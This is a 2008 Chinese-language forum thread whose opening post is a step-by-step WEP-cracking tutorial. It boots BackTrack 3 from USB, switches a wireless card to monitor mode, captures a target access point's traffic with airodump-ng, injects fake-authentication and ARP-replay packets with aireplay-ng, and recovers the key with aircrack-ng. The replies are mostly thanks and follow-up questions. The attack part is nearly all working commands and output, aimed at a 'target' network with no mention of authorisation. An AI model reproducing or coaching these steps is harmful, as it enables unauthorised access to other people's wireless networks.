论坛风格切换
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
  • 30226阅读
  • 69回复

[分享]BT3破解教程(USB) [复制链接]

上一主题 下一主题
离线mingsunalt
 
发帖
54
无线元
253
威望
5
贡献值
0
交易币
0
好评度
1
差评
0
热心积分
0
只看楼主 倒序阅读 使用道具 楼主   发表于: 2008-03-14
— 本帖被 lktsllj 执行加亮操作(2009-04-03) —

一、先开始制作启动U盘:将下载好的backtrack3(BT3) usb版 。(坛子里有,搜一下)把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" 


二、之后重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。
 



三、现在开始破解
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解
[ 此贴被mingsunalt在2008-03-15 12:30重新编辑 ]
1条评分
wireless 金钱 +10 - 2008-03-14
评价一下你浏览此帖子的感受

你太牛了

可以看看

勉强看着

不知所谓

雷死我了
离线咖啡人生

发帖
79
无线元
261
威望
6
贡献值
1
交易币
0
好评度
1
差评
0
热心积分
0
只看该作者 沙发   发表于: 2008-03-14
呵呵,要是详细点就好了~
离线fengzan
发帖
32
无线元
481
威望
0
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 板凳   发表于: 2008-03-16
看着文章写的,里面很多重要的程序都漏了。
离线tiver
发帖
3
无线元
222
威望
1
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 地板   发表于: 2008-03-16
在排好点有点图就最最好了
离线wok4561
发帖
21
无线元
221
威望
1
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 地下室   发表于: 2008-03-17
我已经在本论上看过好多了贴子,有些说的又不一样,请问是不是跟不同型号的网卡有关系,是不是不一样的网卡就用不一样的破解命今呢谢谢!
离线wok4561
发帖
21
无线元
221
威望
1
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 5楼  发表于: 2008-03-17
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
中的,-1 0 是-10 还是,-1空格0(零)呢?我输入上去好像不对哦!
离线mingsunalt
发帖
54
无线元
253
威望
5
贡献值
0
交易币
0
好评度
1
差评
0
热心积分
0
只看该作者 6楼  发表于: 2008-03-17
有的网卡不支持破解的.有的只支持某种破解.用什么破解还要看你的驱动.
离线sonic119
发帖
24
无线元
264
威望
0
贡献值
0
交易币
0
好评度
1
差评
0
热心积分
0
只看该作者 7楼  发表于: 2008-03-18
看得有点迷糊
离线sfih
发帖
23
无线元
520
威望
0
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 8楼  发表于: 2008-03-18
去试试,谢谢
离线cwy2002_2002
发帖
3
无线元
220
威望
1
贡献值
0
交易币
0
好评度
0
差评
0
热心积分
0
只看该作者 9楼  发表于: 2008-03-18
试验一下
快速回复
限150 字节
 
上一个 下一个